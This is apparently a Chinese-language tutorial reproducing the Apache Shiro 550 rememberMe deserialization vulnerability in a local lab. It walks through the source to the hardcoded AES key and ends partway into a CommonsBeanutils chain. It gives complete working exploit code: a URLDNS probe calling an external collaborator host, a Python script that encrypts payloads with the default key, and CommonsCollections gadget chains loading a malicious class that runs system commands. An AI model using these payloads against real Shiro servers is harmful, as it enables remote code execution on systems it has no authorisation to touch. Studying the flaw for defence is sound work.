🌸 环境配置
代码下载地址:https://codeload.github.com/apache/shiro/zip/refs/tags/shiro-root-1.2.4
下载完成之后,需要修改一下pom
文件:
data:image/s3,"s3://crabby-images/f5857/f58578edf909223622740e7fc00a74d4718d90b2" alt=""
修改一下红色框中的配置。然后配置一下tomcat
:
data:image/s3,"s3://crabby-images/9000e/9000ed0f47ba275253e41f762ee9f01666e8b82d" alt=""
点击部署,然后点击"➕",点击"工作":
data:image/s3,"s3://crabby-images/75462/7546261f3b32d7acede1b3f709ce4365929254c0" alt=""
选择红色框中的web
,然后点击应用,确定即可。配置完成之后,点击debug
,出现下面的界面:
data:image/s3,"s3://crabby-images/b1a8e/b1a8eb94eefd7445f51717d1ee505b5a6a1b8f98" alt=""
🌸 利用版本
shiro <= 1.2.4
🌸 漏洞原理
首先我们先看看web
界面:
data:image/s3,"s3://crabby-images/4a7d9/4a7d96a150427e231ebf0fae155328c225f06c90" alt=""
在登陆的时候,可以发现存在一个remember me
的功能,就是相当于后续登陆的免密登陆操作!
data:image/s3,"s3://crabby-images/bf162/bf162aa8fdd850c669dbe158bd8f43fd47eae449" alt=""
勾选这个remember me
功能,尝试登陆,然后抓取数据包!
data:image/s3,"s3://crabby-images/e9bea/e9bea67968243b95d23d98dc07dc2361471f7e79" alt=""
可以看到,当登陆的时候,返回的数据包存在一个Set-Cookie
字段,里面存在一个remember
字段,整个内容是比较长的!
然后看到后续的请求数据包中,都会携带这个cookie
!
data:image/s3,"s3://crabby-images/ce7ec/ce7ecbb97f60b2e5283904dbc926079ce12174e5" alt=""
这个Cookie
其实就是身份凭证信息,正常来说Cookie
都是比较短的,当比较长的时候,一般都是存在一些身份凭证的信息。
接下来尝试在源码中去找rememberme
相关的类:
data:image/s3,"s3://crabby-images/5b01d/5b01d54aae31444fc293a6faf620caf0a7a875fa" alt=""
大概就找到了上面的几个相关的类!CookieRememberMeManager
肯定是和Cookie
中的Remember Me
相关的类了!先看看这个类:
data:image/s3,"s3://crabby-images/57f13/57f13bd8f7a86fe90e79edb1f3d62e68c6a75a06" alt=""
在这个类中找到了一个getRememberedSerializedIdentity
的方法,看名字似乎就是获取已经"记住的、序列化的实体/身份"。
data:image/s3,"s3://crabby-images/102f3/102f397702ac4a1525f631757d6ee55211fb4236" alt=""
在这个方法中,进行了base64
解码!(确实我们在burpsuite
中看到RememberMe
的值,确实像是base64
编码的),接下来我们尝试看看谁调用了这个方法!因为base64
解码之后肯定还有后续的操作!
data:image/s3,"s3://crabby-images/96f55/96f55ea415f0e7c92706441e2ce0f7392cbf8e92" alt=""
于是我们在AbstractRememberMeManager
类中的getRememberedPrincipals
方法中找到了调用!
public PrincipalCollection getRememberedPrincipals(SubjectContext subjectContext) {
PrincipalCollection principals = null;
try {
byte[] bytes = getRememberedSerializedIdentity(subjectContext);
//SHIRO-138 - only call convertBytesToPrincipals if bytes exist:
if (bytes != null && bytes.length > 0) {
principals = convertBytesToPrincipals(bytes, subjectContext);
}
} catch (RuntimeException re) {
principals = onRememberedPrincipalFailure(re, subjectContext);
}
return principals;
}
这个方法的含义大概就是"获取已经记住的身份"。首先就是调用了getRememberedSerializedIdentity
方法,来进行base64
解码,获取到解码后的数据,然后经过了if条件,又调用了convertBytesToPrincipals
方法!尝试跟进到这个方法!
data:image/s3,"s3://crabby-images/da3de/da3deb067a76990cfde30c332e8d54c8b4813f4c" alt=""
在这个方法中,我们可以发现这个方法中先去调用了getCipherService
方法,过if条件之后,调用了decrypt
方法,进行了解密!最后return
反序列化的结果!
到这里的话,整个过程似乎也就清晰了!先进行了base64
解码,然后进行解密,最后进行反序列化操作。
跟进到decrypt方法中进行查看:
protected byte[] decrypt(byte[] encrypted) {
byte[] serialized = encrypted;
CipherService cipherService = getCipherService();
if (cipherService != null) {
ByteSource byteSource = cipherService.decrypt(encrypted, getDecryptionCipherKey());
serialized = byteSource.getBytes();
}
return serialized;
}
发现该方法中,调用了getCipherService()
方法,从方法的名字上来看,似乎这就是一个加密服务。跟进这个方法看一下:
data:image/s3,"s3://crabby-images/12331/123316e6b6abf97205a21bc6dcb541db073ca167" alt=""
似乎也没什么具体的代码,返回了一个cipherService
。
data:image/s3,"s3://crabby-images/3201d/3201d5fdeef600e38cb8c8e3cfa06a361d4e1f29" alt=""
看起来就是一个加密的服务,后面通过if条件之后,又再次调用了decrypt
方法,这一次中有了实参。一个是加密的字符串,第二个参数是方法getDecryptionCipherKey
,看名字也是比较清晰,就是获取了解密的密钥!跟进到这个方法中进行查看!
data:image/s3,"s3://crabby-images/8eed6/8eed6cba03918540bb5d87a462de91f8f3601001" alt=""
猜的没错就是获取了加密的密钥,在这个方法的前后发现了set
方法:
data:image/s3,"s3://crabby-images/9ef66/9ef66fcabca1e5c4ab67b048a3be90838e9e6150" alt=""
下面的这个方法是设置加密密钥!所以我们可以看看谁调用过,并且传递了key
!
data:image/s3,"s3://crabby-images/66dac/66dac6f4af152f36498c6e0eef7a67a586797f27" alt=""
于是我们便找到了这个方法!源码如下:
public void setCipherKey(byte[] cipherKey) {
//Since this method should only be used in symmetric ciphers
//(where the enc and dec keys are the same), set it on both:
setEncryptionCipherKey(cipherKey);
setDecryptionCipherKey(cipherKey);
}
通过这个setCipherKey
方法,设置了加密和解密的密钥!密钥是一样的,所以采用的就是对称加密。继续向上找看看谁调用过这个方法!
data:image/s3,"s3://crabby-images/3c5dd/3c5dd7ccb8c614788b1252c85dece1fac104fa23" alt=""
发现在AbstractRememberMeManager
类中的构造器,初始化调用了这个方法!并且传递的参数是一个常量!跟进到定义处!(同时上面的AesCipherService
方法,也提示了我们采用的加密方式是AES
加密)
data:image/s3,"s3://crabby-images/9fada/9fada9b2b960033748c0c1a324d6eb9ab2479fc7" alt=""
在定义处,发现AES
加解密的密钥居然被固定了。这便是整个漏洞的根本原因所在!
再次回顾shiro550
漏洞的原理,便是AES
加密的key
被硬编码在了源码中!所以攻击者可以构造一个序列化的字符串,然后经过AES
加密,base64
编码,最终将payload
作为Cookie
中的rememberme
字段的参数值,发送到服务器,当服务器收到payload
的时候,服务器便会进行base64
解码,AES
解码,最后将其进行反序列化操作,从而执行了命令执行!
🌸 URLDNS链利用
既然上面已经是对整个过程比较清晰了,所以我们就可以先利用URLDNS
链进行分析利用!直接将URLDNS
链的payload
拿过来尝试利用:
package org.y4y17;
import java.io.*;
import java.lang.reflect.Field;
import java.net.MalformedURLException;
import java.net.URL;
import java.util.HashMap;
public class URLDNS {
public static void main(String[] args) throws NoSuchFieldException, IOException, IllegalAccessException, ClassNotFoundException {
HashMap<URL,Integer> hashMap = new HashMap<URL,Integer>();
URL url = new URL("http://hvglmw9fk7epzqg930hrcvogs7y0m5au.oastify.com");
//绕过put时,hashCode=-1,此时需要通过反射去改变hashCode的参数值不为-1,然后再put
Class urlClass = URL.class;
Field hashCode = urlClass.getDeclaredField("hashCode");
hashCode.setAccessible(true);
hashCode.set(url,1);
//上面已经通过反射机制将url的hashCode设置为1,避免了在put的时候就发生DNS请求
hashMap.put(url,1);
System.out.println(url.hashCode());
//put完之后,还需要将hashCode改回-1
hashCode.set(url,-1);
//然后进行序列化操作
serialization(hashMap);
//序列化完成之后,再进行反序列化操作
// deserialization();
}
public static void serialization(Object o) throws IOException {
ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream("urldns.ser"));
objectOutputStream.writeObject(o);
objectOutputStream.close();
}
public static void deserialization() throws IOException, ClassNotFoundException {
ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream("urldns.ser"));
objectInputStream.readObject();
objectInputStream.close();
}
}
序列化生成文件之后,尝试编写base64
和AES
加密,从而生成payload
!
import base64
import uuid
from Crypto.Cipher import AES
from Crypto.Random import get_random_bytes
def get_file_data(filename):
with open(filename,'rb') as file:
data = file.read()
return data
def aes_encrypt_data(data,key):
BS = AES.block_size
pad = lambda s :s+((BS - len(s) % BS ) * chr(BS - len(s) % BS)).encode()
mode = AES.MODE_CBC
iv = uuid.uuid4().bytes
cipher = AES.new(base64.b64decode(key), mode, iv)
ciphertext = base64.b64encode(iv+cipher.encrypt(pad(data)))
return ciphertext
# Example usage
if __name__ == "__main__":
key = "kPH+bIxk5D2deZiIxcaaaA==" # Generate a random 16-byte AES key
file_path = "urldns.ser" # Replace with your file path
data = get_file_data(filename=file_path)
payload = aes_encrypt_data(data=data,key=key)
print(payload)
利用Burpsuite
平台进行测试DNS
请求:
data:image/s3,"s3://crabby-images/6055a/6055a8017f02e672fadf18c55229d5d66f73eba0" alt=""
生成序列化文件之后,然后利用python
读取序列化文件生成payload
即可:
data:image/s3,"s3://crabby-images/53b28/53b28e381e6a315005c559d72e64ca0879c07cd8" alt=""
生成payload
,然后替换掉rememberme
的参数值!(这里需要注意的是,也需要将JSESSIONID
删掉,他是一个身份凭证的验证信息。)
data:image/s3,"s3://crabby-images/ad3de/ad3de735fc90e7e1ae70e62e560b89fb15484099" alt=""
之后改成我们的payload
,重放数据包!
data:image/s3,"s3://crabby-images/ffc66/ffc662d5820e5c00f58182ac124b68c7b31a1365" alt=""
BurpSuite
收到了DNS
请求。
🌸 RCE
🍂 cc6+TemplatesImpl
需要注意的是:shiro
原生是没cc
依赖的! 所以整个cc
链子就打不了!
既然上面已经通过URLDNS
链,证明了整个链子的可行性。但是我们还是想着能够真正的RCE
,所以,我们进行尝试!首先就是打什么👖的问题,可以看到整个项目中虽然是有cc
依赖的!但是其实是打不了的!
data:image/s3,"s3://crabby-images/639bc/639bc1d91b3c81af07a754e7eafb5306f0a313a3" alt=""
具体原因是:maven
在编译和运行的时候,只会将complie
打进包里面,而test
是不会打进来的,所以理论上来说用cc
的打shiro
是打不了的,只能打cb
(这里后续再看这个。)
这里可以用一个插件去分析,暂时没用。主要是看的组长的视频进行学习。
所以本地测试的话,就需要在pom
文件中添加cc
的依赖:
data:image/s3,"s3://crabby-images/39832/39832dab125bcf063b14e336fcdc2baadc9316aa" alt=""
正常大家都是添加的cc4
的依赖,因为在利用的时候cc2
链子是可以使用的,所以可以添加cc4
的依赖,这并不代表着cc3
的依赖就打不了。
所以这里还是先添加了cc3
的依赖。进行尝试。把前面的cc6
链子的exp
拿过来尝试利用:
public class cc6 {
public static void main(String[] args) throws NoSuchFieldException, IllegalAccessException, IOException, ClassNotFoundException {
Transformer[] transformers = new Transformer[]{
new ConstantTransformer(Runtime.class),
new InvokerTransformer("getDeclaredMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",null}),
new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"})
};
ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
Map<String, Object> map = new HashMap<>();
Map lazymap = LazyMap.decorate(map, new ChainedTransformer(new Transformer[]{}));
TiedMapEntry tiedMapEntry = new TiedMapEntry(lazymap,"aaa");
HashMap<Object, Object> map2 = new HashMap<>();
map2.put(tiedMapEntry,"bbb");
lazymap.remove("aaa");
Class<LazyMap> lazyMapClass = LazyMap.class;
Field factory = lazyMapClass.getDeclaredField("factory");
factory.setAccessible(true);
factory.set(lazymap,chainedTransformer);
serialization(map2);
// unserialization();
}
public static void serialization(Object o) throws IOException {
ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream("cc66.bin"));
objectOutputStream.writeObject(o);
objectOutputStream.close();
}
public static void unserialization() throws IOException, ClassNotFoundException {
ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream("cc66.bin"));
objectInputStream.readObject();
objectInputStream.close();
}
}
首先还是正常的序列化生成文件,然后利用上面的python
来生成exp
:
data:image/s3,"s3://crabby-images/b5184/b5184bde73e9e547c97fc82b5fe00e72f070b9e6" alt=""
依然是通过抓包来替换掉rememberme
的参数值!
data:image/s3,"s3://crabby-images/fb35e/fb35eef79355a972d3e901d7ed62fa6caf0cfa40" alt=""
这里会发现修改了payload
,之后,并没有成功弹窗!同时还报错了:
data:image/s3,"s3://crabby-images/55194/5519406831130009f31d1f56882890ea3be43d5c" alt=""
报错的含义是无法加载类:org.apache.commons.collections.functors.InvokerTransformer
data:image/s3,"s3://crabby-images/54073/540730cd8ea96e0cdcdea205b9052155dcbd5a04" alt=""
这里看到报错的第一行,我们尝试进入到DefaultSerializer.java
类中看一下:
data:image/s3,"s3://crabby-images/5a2b4/5a2b4283419561073a55e5b465a45a4f8888dfe9" alt=""
而是shiro自己常见的一个类,跟进到ClassResolvingObjectInputStream.java
类中(该类继承了ObjectInput Stream
类)
data:image/s3,"s3://crabby-images/32ea7/32ea7fcbf0065e400ce025a6f04bea34f9a29847" alt=""
在这个类中重写了resolveClass
方法:
protected Class<?> resolveClass(ObjectStreamClass osc) throws IOException, ClassNotFoundException {
try {
return ClassUtils.forName(osc.getName());
} catch (UnknownClassException e) {
throw new ClassNotFoundException("Unable to load ObjectStreamClass [" + osc + "]: ", e);
}
}
resolveClass
是反序列化中用来查找类的方法,在读取序列化流的时候,读取到一个字符串形式的类名,需要通过这个方法来找到对应的Class
对象。该类是通过ClassUtils
的forname
方法来处理的。
我们对比一下ObjectInputStream
类中的resolveClass
方法!
data:image/s3,"s3://crabby-images/fcc1f/fcc1fec2d100e6c99107c7b59979f225490deeb9" alt=""
可以看到一个是通过Class
的forname
方法进行类加载,一个是通过ClassUtils
进行类加载。
data:image/s3,"s3://crabby-images/23c4a/23c4ab3225d8cfadbfe468c98dcbb7b5f68697bf" alt=""
继续跟进到ClassUtils
的forname
方法中进行查看!发现他的整个流程是先进行一次加载,如果不存在
(总结一下就是用不了Transformer数组了!)
这里就需要改写一下payload
,不能使用数组了。这里采用的是cc6+templatesImpl
,进行利用。因为我们如果采用的是调用getRuntime
的exec
方法的话,就必须使用数组,这类似于cc1
等:
package org.y4y17;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.functors.MapTransformer;
import org.apache.commons.collections.map.TransformedMap;
import java.lang.reflect.Constructor;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.util.HashMap;
import java.util.Map;
public class Main {
public static void main(String[] args) throws ClassNotFoundException, InstantiationException, IllegalAccessException, NoSuchMethodException, InvocationTargetException {
//由于ChainedTransformer类中构造器需要传递的参数是Transformer数组,因此创建一个Transformer数组,将上面的三个InvokerTransformer放进去
Transformer[] transformers = new Transformer[]{
new InvokerTransformer("getDeclaredMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",null}),
new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,null}),
new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"})
};
ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
chainedTransformer.transform(Runtime.class);
// 的transform方法
}
}
在cc1
中我们不得不采用transformers
数组来递归的执行,直到最后去执行exec
方法!因为在cc6
中我们可以通过HashMap
控制传递的参数,所以可以采用cc6
的前面的半条链子,再加上TemplatesImpl
链来形成最终的利用链。
data:image/s3,"s3://crabby-images/ffef7/ffef7576d98e88dab90b12ae79f22a83fcd9b2c3" alt=""
这里的代码就直接把TemplatesImpl
的链子拿来。后面利用HashMap
来控制。也就是cc6
的链子:
data:image/s3,"s3://crabby-images/5ba3f/5ba3f4195c8e4084cdd0db24652292df5d689d5b" alt=""
静态调试一下代码,我们想要通过HashMap
的readObject
开始调用:
data:image/s3,"s3://crabby-images/e25c6/e25c6c354e68587d665edf7995ddb9da17947221" alt=""
然后调用hash(key)
方法!
data:image/s3,"s3://crabby-images/372fc/372fc8c3e02ecdb4540ba60f0d2f20c436b592c4" alt=""
然后调用了key.hashCode()
方法,这里的key
就是TiedMapEntry
的hashCode
方法,所以HashMap里面需要存放的key
就是TiedMapEntry
。然后继续跟进:
data:image/s3,"s3://crabby-images/8a8e4/8a8e402082391d38a494af9ec02a83c9765a96dc" alt=""
TiedMapEntry
里面的map
就是LazyMap
,key
的话就是TemplatesImpl
data:image/s3,"s3://crabby-images/fcc06/fcc06845cf790373b8f6d18146893fa68226ebd4" alt=""
这里就跟进到了LazyMap
的get
方法中!然后factory
就需要设置成invokertransformer
。然后执行了invokertransformer
的transform
方法:
data:image/s3,"s3://crabby-images/fc7de/fc7dee23022e9da5109db0813d0a9e486de8ed61" alt=""
由于我们传递的key
,其实也就是input
形参,是TemplatesImpl
。
data:image/s3,"s3://crabby-images/dde08/dde08a5bb90408020d7925bd771d67e49021e674" alt=""
同时TemplatesImpl
的newTransformer
方法,所以在new InvokerTransformer
方法的时候,传递的方法名就是newTransformer
方法,参数为空即可。
整个代码需要在getTransletInstance
方法中继续执行,继续跟进:
data:image/s3,"s3://crabby-images/fcbd0/fcbd09e1c51514185eef8efb4443c2959d731dfd" alt=""
这里就需要满足_name
变量不可以为空,随便设置一个就好了。然后_class
变量需要为空!然后进入到defineTransletClasses
方法中进行加载:
private void defineTransletClasses()
throws TransformerConfigurationException {
if (_bytecodes == null) {
ErrorMsg err = new ErrorMsg(ErrorMsg.NO_TRANSLET_CLASS_ERR);
throw new TransformerConfigurationException(err.toString());
}
TransletClassLoader loader = (TransletClassLoader)
AccessController.doPrivileged(new PrivilegedAction() {
public Object run() {
return new TransletClassLoader(ObjectFactory.findClassLoader(),_tfactory.getExternalExtensionsMap());
}
});
try {
final int classCount = _bytecodes.length;
_class = new Class[classCount];
if (classCount > 1) {
_auxClasses = new HashMap<>();
}
for (int i = 0; i < classCount; i++) {
_class[i] = loader.defineClass(_bytecodes[i]);
final Class superClass = _class[i].getSuperclass();
// Check if this is the main class
if (superClass.getName().equals(ABSTRACT_TRANSLET)) {
_transletIndex = i;
}
else {
_auxClasses.put(_class[i].getName(), _class[i]);
}
}
if (_transletIndex < 0) {
ErrorMsg err= new ErrorMsg(ErrorMsg.NO_MAIN_TRANSLET_ERR, _name);
throw new TransformerConfigurationException(err.toString());
}
}
catch (ClassFormatError e) {
ErrorMsg err = new ErrorMsg(ErrorMsg.TRANSLET_CLASS_ERR, _name);
throw new TransformerConfigurationException(err.toString());
}
catch (LinkageError e) {
ErrorMsg err = new ErrorMsg(ErrorMsg.TRANSLET_OBJECT_ERR, _name);
throw new TransformerConfigurationException(err.toString());
}
}
在上述的代码中需要满足如下条件:
if (superClass.getName().equals(ABSTRACT_TRANSLET)) {
_transletIndex = i;
}
所以我们的恶意类就需要继承父类:com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet
,因此这里就需要修改一下恶意类:
package org.y4y17;
import java.io.IOException;
import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
public class exec extends AbstractTranslet{
static {
try {
Runtime.getRuntime().exec("open -a calculator");
} catch (IOException e) {
throw new RuntimeException(e);
}
}
@Override
public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
}
@Override
public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
}
}
整个代码的分析其实就是TemplatesImpl
链的原理。
最后的poc
:
package org.y4y17;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;
import java.io.*;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.HashMap;
import java.util.Map;
public class shiro550_cc3 {
public static void main(String[] args) throws Exception {
TemplatesImpl templates = new TemplatesImpl();
Class<? extends TemplatesImpl> templatesClass = templates.getClass();
Field nameFeild = templatesClass.getDeclaredField("_name");
nameFeild.setAccessible(true);
nameFeild.set(templates,"aaa");
Field bytecodesField = templatesClass.getDeclaredField("_bytecodes");
bytecodesField.setAccessible(true);
byte[] code = Files.readAllBytes(Paths.get("exec2.class"));
byte[][] codes = {code};
bytecodesField.set(templates,codes);
Field tfactoryField = templatesClass.getDeclaredField("_tfactory");
tfactoryField.setAccessible(true);
tfactoryField.set(templates,new TransformerFactoryImpl());
InvokerTransformer invokerTransformer = new InvokerTransformer("newTransformer", null, null);
Map<String, Object> map = new HashMap<>();
Map lazymap = LazyMap.decorate(map, new ConstantTransformer(1));
TiedMapEntry tiedMapEntry = new TiedMapEntry(lazymap,templates);
HashMap<Object, Object> map2 = new HashMap<>();
map2.put(tiedMapEntry,"bbb");
lazymap.remove(templates);
Class<? extends Map> aClass = lazymap.getClass();
Field factoryFiled = aClass.getDeclaredField("factory");
factoryFiled.setAccessible(true);
factoryFiled.set(lazymap,invokerTransformer);
serialize(map2);
// unserialize("2.bin");
}
public static void serialize(Object obj) throws IOException {
ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("2.bin"));
oos.writeObject(obj);
oos.close();
}
//反序列化数据
public static Object unserialize(String Filename) throws IOException, ClassNotFoundException{
ObjectInputStream ois = new ObjectInputStream(new FileInputStream(Filename));
Object obj = ois.readObject();
ois.close();
return obj;
}
}
通过上述文件生成序列化文件,然后利用python
生成一个payload
:
data:image/s3,"s3://crabby-images/1b745/1b74544ca2fd887385fcc4e4b861e155545e3f71" alt=""
替换掉rememberme
,再次发送数据包:
data:image/s3,"s3://crabby-images/8a325/8a325c235ce295edafe5b3e334212a0ee4fddab3" alt=""
最终靶机弹出了计算器:
data:image/s3,"s3://crabby-images/d9ba9/d9ba94277a4b9815ea44c50a9b6c1b2aa11e0b94" alt=""
🍂 cc6+InstantiateTransformer
利用cc6+cc3
的中的InstantiateTransformer
也是可以进行利用的!
利用代码如下:
package org.y4y17;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InstantiateTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;
import javax.xml.transform.Templates;
import javax.xml.transform.TransformerConfigurationException;
import java.io.*;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.HashMap;
import java.util.Map;
public class shiro550_exp1 {
public static void main(String[] args) throws NoSuchFieldException, IllegalAccessException, IOException, TransformerConfigurationException, ClassNotFoundException {
//cc2
TemplatesImpl templates = new TemplatesImpl();
Class<? extends TemplatesImpl> templatesClass = templates.getClass();
Field nameFeild = templatesClass.getDeclaredField("_name");
nameFeild.setAccessible(true);
nameFeild.set(templates,"aaa");
Field bytecodesField = templatesClass.getDeclaredField("_bytecodes");
bytecodesField.setAccessible(true);
byte[] code = Files.readAllBytes(Paths.get("exec.class"));
byte[][] codes = {code};
bytecodesField.set(templates,codes);
//cc3
InstantiateTransformer instantiateTransformer = new InstantiateTransformer(new Class[]{Templates.class},new Object[]{templates});
//下面回去调用transform方法,这里需要传入参数的Object input,这里的input就是TrAXFilter类的对象
//cc6
Map<String, Object> map = new HashMap<>();
Map lazymap = LazyMap.decorate(map, new ConstantTransformer(1));
TiedMapEntry tiedMapEntry = new TiedMapEntry(lazymap,TrAXFilter.class); //需要修改一下key的值
HashMap<Object, Object> map2 = new HashMap<>();
map2.put(tiedMapEntry,"bbb");
lazymap.remove(TrAXFilter.class); //需要修改key
Class<LazyMap> lazyMapClass = LazyMap.class;
Field factory = lazyMapClass.getDeclaredField("factory");
factory.setAccessible(true);
factory.set(lazymap,instantiateTransformer);
// serialization(map2);
unserialization();
}
public static void serialization(Object o) throws IOException {
ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream("shiro2.bin"));
objectOutputStream.writeObject(o);
objectOutputStream.close();
}
public static void unserialization() throws IOException, ClassNotFoundException {
ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream("shiro2.bin"));
objectInputStream.readObject();
objectInputStream.close();
}
}
整个代码变了就是将InvokerTransformer
换成了InstantiateTransformer
。
继续进行分析:
data:image/s3,"s3://crabby-images/50d01/50d01d0e988ed51c1f78f35aa09a47135b7adc6e" alt=""
这是InstantiateTransformer
中的transform
方法!这里的input
我们设置为TrAXFilter
。从而就可以执行他的构造器,而InstantiateTransformer
便是通过输入一个类,获取到相关的构造器,来执行构造器!
data:image/s3,"s3://crabby-images/06339/06339090575aed27bf007eda8e3d411770df3fdc" alt=""
那么这里的InstantiateTransformer
构造器初始化,就可以设置参数了!就是我们调用TrAXFilter
的那一个构造器!
data:image/s3,"s3://crabby-images/e7224/e7224be54de6da99eb46289de4161d73797ff5c9" alt=""
很明显我们要执行的构造器是
public TrAXFilter(Templates templates) throws
TransformerConfigurationException
{
_templates = templates;
_transformer = (TransformerImpl) templates.newTransformer();
_transformerHandler = new TransformerHandlerImpl(_transformer);
_useServicesMechanism = _transformer.useServicesMechnism();
}
因此这里就比较清楚了!写一下InstantiateTransformer
:
InstantiateTransformer instantiateTransformer = new InstantiateTransformer(new Class[]{Templates.class},new Object[]{template});
还有一个问题就是InstantiateTransformer
的transform
方法中的input
,需要是TrAXFilter
,往上看赋值的地方:
data:image/s3,"s3://crabby-images/2ea8e/2ea8e4a5d75565a31f5f67a96fb2bf2a294ce84c" alt=""
其实就是LazyMap
的get
方法中,key
就是TrAXFilter
,也就是TiedMapEntry
中的key
就是TrAXFilter
。其他的都是一样的了!
data:image/s3,"s3://crabby-images/d690a/d690a8681ba1ea1c7012faa235ac512ed567b03a" alt=""
同样也是可以执行代码的!
🍂 commons-beanutils
正常来说是打commons-beanutils这个依赖。这个是shiro自带的依赖!
data:image/s3,"s3://crabby-images/bdeb4/bdeb492680d3db9685b8e99e873f39a307b75db7" alt=""
我们知道commons-collections是对集合类的增强,而commons-beanutils则是对java bean的增强!
所以我们就需要知道什么是java bean!
🦄 java-bean
创建bean的流程:
-
创建一个类,并且继承自java.io.Serializable接口。
-
定义bean的属性
-
为每一个属性创建一对访问器方法,一个用于设置值,一个用于获取值
-
确保遵循JavaBeans命名约定。
package org.y4y17.javaBean;
import java.io.Serializable;
public class PersonBean implements Serializable {
private int age;
private String name;public int getAge() { return age; } public void setAge(int age) { this.age = age; } public String getName() { return name; } public void setName(String name) { this.name = name; }
}
其实理解下来就是为每一个属性都设置上 set和get方法!正常我们去访问里面的某一个属性的时候,就是通过get方法进行获取,而设置属性的值就是通过set方法了。
package org.y4y17.javaBean;
public class Test {
public static void main(String[] args) {
PersonBean personBean = new PersonBean("Y4y17",22);
System.out.println(personBean.getAge());
System.out.println(personBean.getName());
}
}
如上代码,我们去访问每一个属性的时候,就会比较麻烦。然而在commons-beanutils中,提供了动态访问的方法:
package org.y4y17.javaBean;
import org.apache.commons.beanutils.PropertyUtils;
import java.lang.reflect.InvocationTargetException;
public class Test {
public static void main(String[] args) throws InvocationTargetException, IllegalAccessException, NoSuchMethodException {
PersonBean personBean = new PersonBean("Y4y17",22);
System.out.println(PropertyUtils.getProperty(personBean,"age"));
System.out.println(PropertyUtils.getProperty(personBean,"name"));
}
}
在commons-beanutils中提供的PropertyUtils.getProperty方法中,就可以通过传递参数:要获取属性的对象,属性名;来获取具体的值。
这里就是动态去调用了对应属性的get方法来获取具体的值。所以这里也就出现了动态的代码执行的地方,也就带来了一定的安全漏洞。
这里我们尝试调试一下看一下整个流程:
data:image/s3,"s3://crabby-images/a0620/a062065de7a7a11360c7238d0a62dace0b5df247" alt=""
跟进到PropertyUtils.getProperty方法中,发现又调用了另一个对象的getProperty方法!继续向下跟进:
data:image/s3,"s3://crabby-images/0626a/0626af8d907fdcd8953151271dad518f1d2db1ca" alt=""
此时就跟进到了PropertyUtilsBean类中的getProperty方法中!这里就调用了一个getNestedProperty方法,该方法是用于获取嵌套的属性。
继续向下跟进:
data:image/s3,"s3://crabby-images/3986a/3986a0c054ae9c7cfc2f80652c937816b8f1edb3" alt=""
然后判断是不是Map
和索引,如果是的话,就调用对应的获取属性的方法,否则的话就调用getSimpleProperty
方法。
所以我们获取的既不是Map也不是索引,所以说会调用getSimpleProperty
方法!
data:image/s3,"s3://crabby-images/bcaff/bcaff92e42383fd3078ec53863ddc97c07d2320c" alt=""
继续往下跟进,发现进入到了这个方法中!
data:image/s3,"s3://crabby-images/f5efe/f5efe3895282e55a38af98c56613d5638b4980db" alt=""
继续往下走,发现他最终获取到了我们传递的这个age的set和get方法!同时还有一个baseName,值为Age,是大写的!这是javabean的命名格式,类似于驼峰命名,会把我们传进去的age,第一个字母转变为大写。
继续往下走:
data:image/s3,"s3://crabby-images/86867/868677510b4d76949ddfc602ffe5034f1d5675d7" alt=""
通过readMethod方法获取到对应的method,可以看到readMethod的值也就是getAge!
继续往下:
data:image/s3,"s3://crabby-images/3304b/3304b40cd99ef6b9279e600657551e2333c06294" alt=""
就会反射调用。
data:image/s3,"s3://crabby-images/a1fc3/a1fc3f1877f46a7c5871c36ee330aa1af4f71098" alt=""
这里就会对传递进去的对象调用一个符合javabean格式的方法。
然而到这里的话,就可以继续回到整个commons-beanutils中了,在TemplatesImpl类中存在一个getOutputProperties方法:
data:image/s3,"s3://crabby-images/1c74b/1c74bd5f4523998b7abad586e298f5394debbd30" alt=""
然而在这个方法中,调用了newTransformer方法!这就是我们之前cc3的链子,代码执行的一部分。所以我们是不是可以通过PropertyUtils.getProperty方法,来调用一个Templates对象的getOutputProperties方法呢!从而调用了newTransformer方法!
于是我们这里可以将cc3的后半段链子拿过来尝试:
package org.y4y17.javaBean;
